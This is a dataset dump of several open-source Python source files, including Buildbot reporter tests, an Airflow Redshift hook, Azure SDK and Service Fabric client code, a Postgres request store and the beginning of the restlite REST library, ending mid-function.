text
stringlengths
6
947k
repo_name
stringlengths
5
100
path
stringlengths
4
231
language
stringclasses
1 value
license
stringclasses
15 values
size
int64
6
947k
score
float64
0
0.34
# This file is part of Buildbot. Buildbot is free software: you can # redistribute it and/or modify it under the terms of the GNU General Public # License as published by the Free Software Foundation, version 2. # # This program is distributed in the hope that it will be useful, but WITHOUT # ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS # FOR A PARTICULAR PURPOSE. See the GNU General Public License for more # details. # # You should have received a copy of the GNU General Public License along with # this program; if not, write to the Free Software Foundation, Inc., 51 # Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. # # Copyright Buildbot Team Members import textwrap from twisted.internet import defer from twisted.trial import unittest from buildbot.process.results import FAILURE from buildbot.process.results import RETRY from buildbot.process.results import SUCCESS from buildbot.reporters import utils from buildbot.test import fakedb from buildbot.test.fake import fakemaster from buildbot.test.util import logging from buildbot.test.util.misc import TestReactorMixin class TestDataUtils(TestReactorMixin, unittest.TestCase, logging.LoggingMixin): LOGCONTENT = textwrap.dedent("""\ line zero line 1 """) def setUp(self): self.setUpTestReactor() self.master = fakemaster.make_master(self, wantData=True, wantDb=True, wantMq=True) def setupDb(self): self.db = self.master.db self.db.insertTestData([ fakedb.Master(id=92), fakedb.Worker(id=13, name='wrk'), fakedb.Buildset(id=98, results=SUCCESS, reason="testReason1"), fakedb.Builder(id=80, name='Builder1'), fakedb.BuildRequest(id=9, buildsetid=97, builderid=80), fakedb.BuildRequest(id=10, buildsetid=97, builderid=80), fakedb.BuildRequest(id=11, buildsetid=98, builderid=80), fakedb.BuildRequest(id=12, buildsetid=98, builderid=80), fakedb.Build(id=18, number=0, builderid=80, buildrequestid=9, workerid=13, masterid=92, results=FAILURE), fakedb.Build(id=19, number=1, builderid=80, buildrequestid=10, workerid=13, masterid=92, results=RETRY), fakedb.Build(id=20, number=2, builderid=80, buildrequestid=11, workerid=13, masterid=92, results=SUCCESS), fakedb.Build(id=21, number=3, builderid=80, buildrequestid=12, workerid=13, masterid=92, results=SUCCESS), fakedb.BuildsetSourceStamp(buildsetid=98, sourcestampid=234), fakedb.SourceStamp(id=234), fakedb.Change(changeid=13, branch='trunk', revision='9283', author='me@foo', repository='svn://...', codebase='cbsvn', project='world-domination', sourcestampid=234), fakedb.Patch(id=99, patch_base64='aGVsbG8sIHdvcmxk', patch_author='him@foo', patch_comment='foo', subdir='/foo', patchlevel=3), fakedb.SourceStamp(id=235, patchid=99), ]) for _id in (20, 21): self.db.insertTestData([ fakedb.BuildProperty( buildid=_id, name="workername", value="wrk"), fakedb.BuildProperty( buildid=_id, name="reason", value="because"), fakedb.BuildProperty( buildid=_id, name="owner", value="him"), fakedb.Step(id=100 + _id, buildid=_id, name="step1"), fakedb.Step(id=200 + _id, buildid=_id, name="step2"), fakedb.Log(id=60 + _id, stepid=100 + _id, name='stdio', slug='stdio', type='s', num_lines=2), fakedb.LogChunk(logid=60 + _id, first_line=0, last_line=1, compressed=0, content=self.LOGCONTENT), ]) @defer.inlineCallbacks def getChangesForBuild(buildid): assert buildid == 20 ch = yield self.master.db.changes.getChange(13) return [ch] self.master.db.changes.getChangesForBuild = getChangesForBuild @defer.inlineCallbacks def test_getDetailsForBuildset(self): self.setupDb() res = yield utils.getDetailsForBuildset(self.master, 98, wantProperties=True, wantSteps=True, wantPreviousBuild=True) self.assertEqual(len(res['builds']), 2) build1 = res['builds'][0] build2 = res['builds'][1] buildset = res['buildset'] self.assertEqual(build1['properties'], {'reason': ('because', 'fakedb'), 'owner': ('him', 'fakedb'), 'workername': ('wrk', 'fakedb')}) self.assertEqual(len(build1['steps']), 2) self.assertEqual(build1['buildid'], 20) self.assertEqual(build2['buildid'], 21) self.assertEqual(buildset['bsid'], 98) # make sure prev_build was computed self.assertEqual(build1['prev_build']['buildid'], 18) self.assertEqual(build2['prev_build']['buildid'], 20) @defer.inlineCallbacks def test_getDetailsForBuildsetWithLogs(self): self.setupDb() res = yield utils.getDetailsForBuildset(self.master, 98, wantProperties=True, wantSteps=True, wantPreviousBuild=True, wantLogs=True) build1 = res['builds'][0] self.assertEqual( build1['steps'][0]['logs'][0]['content']['content'], self.LOGCONTENT) @defer.inlineCallbacks def test_getResponsibleUsers(self): self.setupDb() res = yield utils.getResponsibleUsersForSourceStamp(self.master, 234) self.assertEqual(res, ["me@foo"]) @defer.inlineCallbacks def test_getResponsibleUsersFromPatch(self): self.setupDb() res = yield utils.getResponsibleUsersForSourceStamp(self.master, 235) self.assertEqual(res, ["him@foo"]) @defer.inlineCallbacks def test_getResponsibleUsersForBuild(self): self.setupDb() res = yield utils.getResponsibleUsersForBuild(self.master, 20) self.assertEqual(sorted(res), sorted(["me@foo", "him"])) @defer.inlineCallbacks def test_getResponsibleUsersForBuildWithBadOwner(self): self.setUpLogging() self.setupDb() self.db.insertTestData([ fakedb.BuildProperty( buildid=20, name="owner", value=["him"]), ]) res = yield utils.getResponsibleUsersForBuild(self.master, 20) self.assertLogged("Please report a bug") self.assertEqual(sorted(res), sorted(["me@foo", "him"])) @defer.inlineCallbacks def test_getResponsibleUsersForBuildWithOwners(self): self.setupDb() self.db.insertTestData([ fakedb.BuildProperty( buildid=20, name="owners", value=["him", "her"]), ]) res = yield utils.getResponsibleUsersForBuild(self.master, 20) self.assertEqual(sorted(res), sorted(["me@foo", "him", "her"])) @defer.inlineCallbacks def test_getPreviousBuild(self): self.setupDb() build = yield self.master.data.get(("builds", 21)) res = yield utils.getPreviousBuild(self.master, build) self.assertEqual(res['buildid'], 20) @defer.inlineCallbacks def test_getPreviousBuildWithRetry(self): self.setupDb() build = yield self.master.data.get(("builds", 20)) res = yield utils.getPreviousBuild(self.master, build) self.assertEqual(res['buildid'], 18) class TestURLUtils(TestReactorMixin, unittest.TestCase): def setUp(self): self.setUpTestReactor() self.master = fakemaster.make_master(self) def test_UrlForBuild(self): self.assertEqual(utils.getURLForBuild(self.master, 1, 3), 'http://localhost:8080/#builders/1/builds/3')
anish/buildbot
master/buildbot/test/unit/test_reporters_utils.py
Python
gpl-2.0
8,181
0.001834
# -*- coding: utf-8 -*- # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from airflow.contrib.hooks.aws_hook import AwsHook class RedshiftHook(AwsHook): """ Interact with AWS Redshift, using the boto3 library """ def get_conn(self): return self.get_client_type('redshift') # TODO: Wrap create_cluster_snapshot def cluster_status(self, cluster_identifier): """ Return status of a cluster :param cluster_identifier: unique identifier of a cluster :type cluster_identifier: str """ conn = self.get_conn() try: response = conn.describe_clusters( ClusterIdentifier=cluster_identifier)['Clusters'] return response[0]['ClusterStatus'] if response else None except conn.exceptions.ClusterNotFoundFault: return 'cluster_not_found' def delete_cluster( self, cluster_identifier, skip_final_cluster_snapshot=True, final_cluster_snapshot_identifier=''): """ Delete a cluster and optionally create a snapshot :param cluster_identifier: unique identifier of a cluster :type cluster_identifier: str :param skip_final_cluster_snapshot: determines cluster snapshot creation :type skip_final_cluster_snapshot: bool :param final_cluster_snapshot_identifier: name of final cluster snapshot :type final_cluster_snapshot_identifier: str """ response = self.get_conn().delete_cluster( ClusterIdentifier=cluster_identifier, SkipFinalClusterSnapshot=skip_final_cluster_snapshot, FinalClusterSnapshotIdentifier=final_cluster_snapshot_identifier ) return response['Cluster'] if response['Cluster'] else None def describe_cluster_snapshots(self, cluster_identifier): """ Gets a list of snapshots for a cluster :param cluster_identifier: unique identifier of a cluster :type cluster_identifier: str """ response = self.get_conn().describe_cluster_snapshots( ClusterIdentifier=cluster_identifier ) if 'Snapshots' not in response: return None snapshots = response['Snapshots'] snapshots = filter(lambda x: x['Status'], snapshots) snapshots.sort(key=lambda x: x['SnapshotCreateTime'], reverse=True) return snapshots def restore_from_cluster_snapshot(self, cluster_identifier, snapshot_identifier): """ Restores a cluster from its snapshot :param cluster_identifier: unique identifier of a cluster :type cluster_identifier: str :param snapshot_identifier: unique identifier for a snapshot of a cluster :type snapshot_identifier: str """ response = self.get_conn().restore_from_cluster_snapshot( ClusterIdentifier=cluster_identifier, SnapshotIdentifier=snapshot_identifier ) return response['Cluster'] if response['Cluster'] else None def create_cluster_snapshot(self, snapshot_identifier, cluster_identifier): """ Creates a snapshot of a cluster :param snapshot_identifier: unique identifier for a snapshot of a cluster :type snapshot_identifier: str :param cluster_identifier: unique identifier of a cluster :type cluster_identifier: str """ response = self.get_conn().create_cluster_snapshot( SnapshotIdentifier=snapshot_identifier, ClusterIdentifier=cluster_identifier, ) return response['Snapshot'] if response['Snapshot'] else None
zack3241/incubator-airflow
airflow/contrib/hooks/redshift_hook.py
Python
apache-2.0
4,181
0.001196
import asyncio import time import psycopg2 import psycopg2.pool import os import sys class Database: def __init__(self): loop = asyncio.get_event_loop() loop.run_until_complete(self.init_connection()) @asyncio.coroutine def init_connection(self): result = 1 loop_end = time.time() + 10 while time.time() < loop_end: try: self.pool = psycopg2.pool.ThreadedConnectionPool(1, 20, host=os.getenv('DBHOST', 'localhost'), port=os.getenv('DBPORT', '5432'), user=os.getenv('DBUSER', 'stop'), database=os.getenv('DBNAME', 'stop'), password=os.getenv('DBPASS', 'stop')) result = 0 break except: continue if result: print ("Initializing a database connection failed") sys.exit() def get_connection(self): return self.pool.getconn() def put_connection(self, conn): self.pool.putconn(conn) def store_request(self, trip_id, stop_id, device_id, push_notification): conn = self.get_connection() cur = conn.cursor() if device_id == '0': values = (trip_id, stop_id, device_id, True) else: values = (trip_id, stop_id, device_id, not push_notification) sql = "INSERT INTO request (trip_id, stop_id, user_id, device_id, pushed, req_time, canceled) VALUES (%s, %s, 'user', %s, %s, now(), false) RETURNING id" cur.execute(sql, values) request_id = cur.fetchone()[0] conn.commit() self.put_connection(conn) return request_id def get_request_info(self, request_id): conn = self.get_connection() cur = conn.cursor() values = (request_id,) sql = "SELECT trip_id, stop_id FROM request WHERE id = %s" cur.execute(sql, values) result = cur.fetchone() self.put_connection(conn) return result def cancel_request(self, request_id): conn = self.get_connection() cur = conn.cursor() values = (request_id,) sql = "UPDATE request SET canceled = true, cancel_time = now() WHERE id = %s RETURNING trip_id" cur.execute(sql, values) trip_id = cur.fetchone()[0] conn.commit() self.put_connection(conn) return trip_id def get_requests(self, trip_id): conn = self.get_connection() cur = conn.cursor() values = (trip_id,) sql = "SELECT stop_id FROM request WHERE canceled = false AND trip_id = %s" cur.execute(sql, values) result = cur.fetchall() self.put_connection(conn) return result def store_report(self, trip_id, stop_id): conn = self.get_connection() cur = conn.cursor() values = (trip_id, stop_id) sql = "INSERT INTO report (trip_id, stop_id, user_id, report_time) VALUES (%s, %s, 'user', now())" cur.execute(sql, values) conn.commit() self.put_connection(conn) def get_unpushed_requests(self): conn = self.get_connection() cur = conn.cursor() sql = "SELECT trip_id,id,stop_id,device_id FROM request WHERE canceled = false AND pushed = false" cur.execute(sql) result = cur.fetchall() self.put_connection(conn) return result def set_pushed(self, ids): conn = self.get_connection() cur = conn.cursor() values = (tuple(ids),) sql = "UPDATE request SET pushed = true WHERE id IN %s" cur.execute(sql, values) conn.commit() self.put_connection(conn) def add_vehicle(self, vehicle_id, trip_id): conn = self.get_connection() cur = conn.cursor() values = (vehicle_id, trip_id) sql = "INSERT INTO vehicle (vehicle_id, trip_id) VALUES (%s, %s)" cur.execute(sql, values) conn.commit() self.put_connection(conn) def remove_vehicle(self, vehicle_id, trip_id): conn = self.get_connection() cur = conn.cursor() values = (vehicle_id, trip_id) sql = "DELETE FROM vehicle WHERE vehicle_id = %s AND trip_id = %s" cur.execute(sql, values) conn.commit() self.put_connection(conn) def get_vehicles(self): conn = self.get_connection() cur = conn.cursor() sql = "SELECT trip_id FROM vehicle" cur.execute(sql) result = cur.fetchall() self.put_connection(conn) return result
STOP2/stop2.0-backend
src/db.py
Python
mit
4,799
0.004168
# coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is regenerated. # -------------------------------------------------------------------------- import functools from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar import warnings from azure.core.async_paging import AsyncItemPaged, AsyncList from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error from azure.core.pipeline import PipelineResponse from azure.core.pipeline.transport import AsyncHttpResponse from azure.core.rest import HttpRequest from azure.core.tracing.decorator import distributed_trace from azure.core.tracing.decorator_async import distributed_trace_async from azure.mgmt.core.exceptions import ARMErrorFormat from ... import models as _models from ..._vendor import _convert_request from ...operations._subscriptions_operations import build_check_zone_peers_request, build_get_request, build_list_locations_request, build_list_request T = TypeVar('T') ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]] class SubscriptionsOperations: """SubscriptionsOperations async operations. You should not instantiate this class directly. Instead, you should create a Client instance that instantiates it for you and attaches it as an attribute. :ivar models: Alias to model classes used in this operation group. :type models: ~azure.mgmt.resource.subscriptions.v2018_06_01.models :param client: Client for service requests. :param config: Configuration of service client. :param serializer: An object model serializer. :param deserializer: An object model deserializer. """ models = _models def __init__(self, client, config, serializer, deserializer) -> None: self._client = client self._serialize = serializer self._deserialize = deserializer self._config = config @distributed_trace def list_locations( self, subscription_id: str, **kwargs: Any ) -> AsyncIterable["_models.LocationListResult"]: """Gets all available geo-locations. This operation provides all the locations that are available for resource providers; however, each resource provider may support a subset of this list. :param subscription_id: The ID of the target subscription. :type subscription_id: str :keyword callable cls: A custom type or function that will be passed the direct response :return: An iterator like instance of either LocationListResult or the result of cls(response) :rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.resource.subscriptions.v2018_06_01.models.LocationListResult] :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType["_models.LocationListResult"] error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError } error_map.update(kwargs.pop('error_map', {})) def prepare_request(next_link=None): if not next_link: request = build_list_locations_request( subscription_id=subscription_id, template_url=self.list_locations.metadata['url'], ) request = _convert_request(request) request.url = self._client.format_url(request.url) else: request = build_list_locations_request( subscription_id=subscription_id, template_url=next_link, ) request = _convert_request(request) request.url = self._client.format_url(request.url) request.method = "GET" return request async def extract_data(pipeline_response): deserialized = self._deserialize("LocationListResult", pipeline_response) list_of_elem = deserialized.value if cls: list_of_elem = cls(list_of_elem) return None, AsyncList(list_of_elem) async def get_next(next_link=None): request = prepare_request(next_link) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response, error_format=ARMErrorFormat) return pipeline_response return AsyncItemPaged( get_next, extract_data ) list_locations.metadata = {'url': '/subscriptions/{subscriptionId}/locations'} # type: ignore @distributed_trace_async async def get( self, subscription_id: str, **kwargs: Any ) -> "_models.Subscription": """Gets details about a specified subscription. :param subscription_id: The ID of the target subscription. :type subscription_id: str :keyword callable cls: A custom type or function that will be passed the direct response :return: Subscription, or the result of cls(response) :rtype: ~azure.mgmt.resource.subscriptions.v2018_06_01.models.Subscription :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType["_models.Subscription"] error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError } error_map.update(kwargs.pop('error_map', {})) request = build_get_request( subscription_id=subscription_id, template_url=self.get.metadata['url'], ) request = _convert_request(request) request.url = self._client.format_url(request.url) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response, error_format=ARMErrorFormat) deserialized = self._deserialize('Subscription', pipeline_response) if cls: return cls(pipeline_response, deserialized, {}) return deserialized get.metadata = {'url': '/subscriptions/{subscriptionId}'} # type: ignore @distributed_trace def list( self, **kwargs: Any ) -> AsyncIterable["_models.SubscriptionListResult"]: """Gets all subscriptions for a tenant. :keyword callable cls: A custom type or function that will be passed the direct response :return: An iterator like instance of either SubscriptionListResult or the result of cls(response) :rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.resource.subscriptions.v2018_06_01.models.SubscriptionListResult] :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType["_models.SubscriptionListResult"] error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError } error_map.update(kwargs.pop('error_map', {})) def prepare_request(next_link=None): if not next_link: request = build_list_request( template_url=self.list.metadata['url'], ) request = _convert_request(request) request.url = self._client.format_url(request.url) else: request = build_list_request( template_url=next_link, ) request = _convert_request(request) request.url = self._client.format_url(request.url) request.method = "GET" return request async def extract_data(pipeline_response): deserialized = self._deserialize("SubscriptionListResult", pipeline_response) list_of_elem = deserialized.value if cls: list_of_elem = cls(list_of_elem) return deserialized.next_link or None, AsyncList(list_of_elem) async def get_next(next_link=None): request = prepare_request(next_link) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) raise HttpResponseError(response=response, error_format=ARMErrorFormat) return pipeline_response return AsyncItemPaged( get_next, extract_data ) list.metadata = {'url': '/subscriptions'} # type: ignore @distributed_trace_async async def check_zone_peers( self, subscription_id: str, parameters: "_models.CheckZonePeersRequest", **kwargs: Any ) -> "_models.CheckZonePeersResult": """Compares a subscriptions logical zone mapping. :param subscription_id: The ID of the target subscription. :type subscription_id: str :param parameters: Parameters for checking zone peers. :type parameters: ~azure.mgmt.resource.subscriptions.v2018_06_01.models.CheckZonePeersRequest :keyword callable cls: A custom type or function that will be passed the direct response :return: CheckZonePeersResult, or the result of cls(response) :rtype: ~azure.mgmt.resource.subscriptions.v2018_06_01.models.CheckZonePeersResult :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType["_models.CheckZonePeersResult"] error_map = { 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError } error_map.update(kwargs.pop('error_map', {})) content_type = kwargs.pop('content_type', "application/json") # type: Optional[str] _json = self._serialize.body(parameters, 'CheckZonePeersRequest') request = build_check_zone_peers_request( subscription_id=subscription_id, content_type=content_type, json=_json, template_url=self.check_zone_peers.metadata['url'], ) request = _convert_request(request) request.url = self._client.format_url(request.url) pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs) response = pipeline_response.http_response if response.status_code not in [200]: map_error(status_code=response.status_code, response=response, error_map=error_map) error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response) raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat) deserialized = self._deserialize('CheckZonePeersResult', pipeline_response) if cls: return cls(pipeline_response, deserialized, {}) return deserialized check_zone_peers.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Resources/checkZonePeers/'} # type: ignore
Azure/azure-sdk-for-python
sdk/resources/azure-mgmt-resource/azure/mgmt/resource/subscriptions/v2018_06_01/aio/operations/_subscriptions_operations.py
Python
mit
12,046
0.004649
# coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. # -------------------------------------------------------------------------- from msrest.serialization import Model class ClusterUpgradeDescriptionObject(Model): """Represents a ServiceFabric cluster upgrade. :param config_version: The cluster configuration version (specified in the cluster manifest). :type config_version: str :param code_version: The ServiceFabric code version of the cluster. :type code_version: str :param upgrade_kind: The kind of upgrade out of the following possible values. Possible values include: 'Invalid', 'Rolling'. Default value: "Rolling" . :type upgrade_kind: str or ~azure.servicefabric.models.UpgradeKind :param rolling_upgrade_mode: The mode used to monitor health during a rolling upgrade. Possible values include: 'Invalid', 'UnmonitoredAuto', 'UnmonitoredManual', 'Monitored'. Default value: "UnmonitoredAuto" . :type rolling_upgrade_mode: str or ~azure.servicefabric.models.UpgradeMode :param upgrade_replica_set_check_timeout_in_seconds: The maximum amount of time to block processing of an upgrade domain and prevent loss of availability when there are unexpected issues. When this timeout expires, processing of the upgrade domain will proceed regardless of availability loss issues. The timeout is reset at the start of each upgrade domain. Valid values are between 0 and 42949672925 inclusive. (unsigned 32-bit integer). :type upgrade_replica_set_check_timeout_in_seconds: long :param force_restart: If true, then processes are forcefully restarted during upgrade even when the code version has not changed (the upgrade only changes configuration or data). :type force_restart: bool :param enable_delta_health_evaluation: When true, enables delta health evaluation rather than absolute health evaluation after completion of each upgrade domain. :type enable_delta_health_evaluation: bool :param monitoring_policy: Describes the parameters for monitoring an upgrade in Monitored mode. :type monitoring_policy: ~azure.servicefabric.models.MonitoringPolicyDescription :param cluster_health_policy: Defines a health policy used to evaluate the health of the cluster or of a cluster node. :type cluster_health_policy: ~azure.servicefabric.models.ClusterHealthPolicy :param cluster_upgrade_health_policy: Defines a health policy used to evaluate the health of the cluster during a cluster upgrade. :type cluster_upgrade_health_policy: ~azure.servicefabric.models.ClusterUpgradeHealthPolicyObject :param application_health_policy_map: Defines a map that contains specific application health policies for different applications. Each entry specifies as key the application name and as value an ApplicationHealthPolicy used to evaluate the application health. If an application is not specified in the map, the application health evaluation uses the ApplicationHealthPolicy found in its application manifest or the default application health policy (if no health policy is defined in the manifest). The map is empty by default. :type application_health_policy_map: list[~azure.servicefabric.models.ApplicationHealthPolicyMapItem] """ _attribute_map = { 'config_version': {'key': 'ConfigVersion', 'type': 'str'}, 'code_version': {'key': 'CodeVersion', 'type': 'str'}, 'upgrade_kind': {'key': 'UpgradeKind', 'type': 'str'}, 'rolling_upgrade_mode': {'key': 'RollingUpgradeMode', 'type': 'str'}, 'upgrade_replica_set_check_timeout_in_seconds': {'key': 'UpgradeReplicaSetCheckTimeoutInSeconds', 'type': 'long'}, 'force_restart': {'key': 'ForceRestart', 'type': 'bool'}, 'enable_delta_health_evaluation': {'key': 'EnableDeltaHealthEvaluation', 'type': 'bool'}, 'monitoring_policy': {'key': 'MonitoringPolicy', 'type': 'MonitoringPolicyDescription'}, 'cluster_health_policy': {'key': 'ClusterHealthPolicy', 'type': 'ClusterHealthPolicy'}, 'cluster_upgrade_health_policy': {'key': 'ClusterUpgradeHealthPolicy', 'type': 'ClusterUpgradeHealthPolicyObject'}, 'application_health_policy_map': {'key': 'ApplicationHealthPolicyMap', 'type': '[ApplicationHealthPolicyMapItem]'}, } def __init__(self, config_version=None, code_version=None, upgrade_kind="Rolling", rolling_upgrade_mode="UnmonitoredAuto", upgrade_replica_set_check_timeout_in_seconds=None, force_restart=None, enable_delta_health_evaluation=None, monitoring_policy=None, cluster_health_policy=None, cluster_upgrade_health_policy=None, application_health_policy_map=None): super(ClusterUpgradeDescriptionObject, self).__init__() self.config_version = config_version self.code_version = code_version self.upgrade_kind = upgrade_kind self.rolling_upgrade_mode = rolling_upgrade_mode self.upgrade_replica_set_check_timeout_in_seconds = upgrade_replica_set_check_timeout_in_seconds self.force_restart = force_restart self.enable_delta_health_evaluation = enable_delta_health_evaluation self.monitoring_policy = monitoring_policy self.cluster_health_policy = cluster_health_policy self.cluster_upgrade_health_policy = cluster_upgrade_health_policy self.application_health_policy_map = application_health_policy_map
lmazuel/azure-sdk-for-python
azure-servicefabric/azure/servicefabric/models/cluster_upgrade_description_object.py
Python
mit
5,840
0.00137
''' restlite: REST + Python + JSON + XML + SQLite + authentication. http://code.google.com/p/restlite Copyright (c) 2009, Kundan Singh, kundan10@gmail.com. All rights reserved. License: released under LGPL (Lesser GNU Public License). This light-weight module allows quick prototyping of web services using the RESTful architecture and allows easy integration with sqlite3 database, and JSON and XML representation format. The approach is to provide all the appropriate tools which you can use to build your own application, instead of providing a intrusive framework. Features: 1. Very lightweight module in pure Python and no other dependencies hence ideal for quick prototyping. 2. Two levels of API: one is not intrusive (for low level WSGI) and other is intrusive (for high level @resource). 3. High level API can conveniently use sqlite3 database for resource storage. 4. Common list and tuple-based representation that is converted to JSON and/or XML. 5. Supports pure REST as well as allows browser and Flash Player access (with GET, POST only). 6. Integrates unit testing using doctest module. 7. Handles HTTP cookies and authentication. Dependencies: Python 2.6. ''' from wsgiref.util import setup_testing_defaults from xml.dom import minidom import re, sys, sqlite3, Cookie, base64, hashlib, time, traceback try: import json except: print 'Cannot import json. Please use Python 2.6.'; raise _debug = False defaultType = 'application/json' # default content type if ACCEPT is */*. Used in represent and router. #------------------------------------------------------------------------------ # REST router #------------------------------------------------------------------------------ def router(routes): '''This is the main low level REST router function that takes a list of routes and sequentially tries to match the request method and URL pattern. If a valid route is matched, request transformation is applied. If an application is specified for a route, then the (wsgiref) application is invoked and the response is returned. This is used together with wsgiref.make_server to launch a RESTful service. Your can use the routes to do several things: identify the response type (JSON, XML) from the URL, identify some parts in the URL as variables available to your application handler, modify some HTTP header or message body based on the URL, convert a GET or POST URL from the browser with URL suffix of /put or /delete to PUT or DELETE URL to handle these commands from the browser, etc. For more details see the project web page. >>> def files_handler(env, start_response): ... return '<files><type>' + env['ACCEPT'] + '</type><file>somefile.txt</file></files>' >>> routes = [ ... (r'GET,PUT,POST /xml/(?P<path>.*)$', 'GET,PUT,POST /%(path)s', 'ACCEPT=text/xml'), ... (r'GET /files$', files_handler) ] >>> r = router(routes) # create the router using these routes >>> # and test using the following code >>> env, start_response = {'REQUEST_METHOD': 'GET', 'PATH_INFO': '/xml/files', 'SCRIPT_NAME': '', 'QUERY_STRING': ''}, lambda x,y: (x, y) >>> print r(env, start_response) <files><type>text/xml</type><file>somefile.txt</file></files> ''' if isinstance(routes, dict) or hasattr(routes, 'items'): routes = routes.iteritems() def handler(env, start_response): import logging setup_testing_defaults(env) if 'wsgiorg.routing_args' not in env: env['wsgiorg.routing_args'] = dict() env['COOKIE'] = Cookie.SimpleCookie() if 'HTTP_COOKIE' in env: env['COOKIE'].load(env['HTTP_COOKIE']) if not 'QUERY_STRING' in env: env['QUERY_STRING']= None for route in routes: method, pattern = route[0].split(' ', 1) methods = method.split(',') if env['REQUEST_METHOD'] not in methods: continue path = env['PATH_INFO'] + ('?' + env['QUERY_STRING'] if env['QUERY_STRING'] else '') match = re.match(pattern, path) if match: app = None if callable(route[-1]): route, app = route[:-1], route[-1] # found the app if len(route) > 1: new_methods, path = route[1].split(' ', 1) env['REQUEST_METHOD'] = new_methods.split(',')[methods.index(env['REQUEST_METHOD'])] env['PATH_INFO'], ignore, env['QUERY_STRING'] = (path % match.groupdict()).partition('?') #@UnusedVariable for name, value in [x.split('=', 1) for x in route[2:]]: env[name] = value % match.groupdict() env['wsgiorg.routing_args'].update(match.groupdict()) if app is not None: matching = match.group(0) env['PATH_INFO'], env['SCRIPT_NAME'] = env['PATH_INFO'][len(matching):], env['SCRIPT_NAME'] + env['PATH_INFO'][:len(matching)] def my_response(status, headers): if 'RESPONSE_HEADERS' not in env: env['RESPONSE_STATUS'], env['RESPONSE_HEADERS'] = status, headers try: response = app(env, my_response) except Status: response, env['RESPONSE_STATUS'] = None, str(sys.exc_info()[1]) except Exception, e: logging.getLogger("platane.restlite").error(e) print traceback.format_exc() response, env['RESPONSE_STATUS'] = [traceback.format_exc()], '500 Internal Server Error' if response is None: response = [] headers = env.get('RESPONSE_HEADERS', [('Content-Type', 'text/plain')]) headers.append( ('Accept-Charset', 'utf-8') ) orig = Cookie.SimpleCookie(); cookie = env['COOKIE'] if 'HTTP_COOKIE' in env: orig.load(env['HTTP_COOKIE']) map(lambda x: cookie.__delitem__(x), [x for x in orig if x in cookie and str(orig[x]) == str(cookie[x])]) if len(cookie): headers.extend([(x[0], x[1].strip()) for x in [str(y).split(':', 1) for y in cookie.itervalues()]]) start_response(env.get('RESPONSE_STATUS', '200 OK'), headers) if _debug: if response: print headers, '\n'+str(response)[:256] if type(response) == str: return [ response ] else: return "" start_response('404 Not Found', [('Content-Type', 'text/plain')]) return ['Use one of these URL forms\n ' + '\n '.join(str(x[0]) for x in routes)] return handler #------------------------------------------------------------------------------ # Representations: JSON, XML #------------------------------------------------------------------------------ def tojson(value): '''The function converts the supplied value to JSON representation. It assumes the unified list format of value. Typically you just call represent(value, type=request['ACCEPT']) instead of manually invoking this method. To be consistent with str(obj) function which uses obj.__str__() method if available, tojson() uses obj._json_() method if available on value. Otherwise it checks obj._list_() method if available to get the unified list format. Otherwise it assumes that the value is in unified list format. The _json_ and _list_ semantics allow you to customize the JSON representation of your object, if needed. >>> value = ('file', (('name', 'myfile.txt'), ('acl', [('allow', 'kundan'), ('allow', 'admin')]))) >>> tojson(value) '{"file": {"name": "myfile.txt", "acl": [{"allow": "kundan"}, {"allow": "admin"}]}}' ''' def list2dict(value): if hasattr(value, '_json_') and callable(value._json_): return value._json_() if hasattr(value, '_list_') and callable(value._list_): value = value._list_() if isinstance(value, tuple) and len(value) == 2 and isinstance(value[0], basestring): if isinstance(value[1], list): return {value[0]: [list2dict(x) for x in value[1]]} elif isinstance(value[1], tuple) and not [x for x in value[1] if not isinstance(x, tuple) or len(x) != 2 or not isinstance(x[0], basestring)]: return {value[0]: dict([(x[0], list2dict(x[1])) for x in value[1]])} else: return {value[0]: list2dict(value[1])} elif isinstance(value, tuple) and not [x for x in value if not isinstance(x, tuple) or len(x) != 2 or not 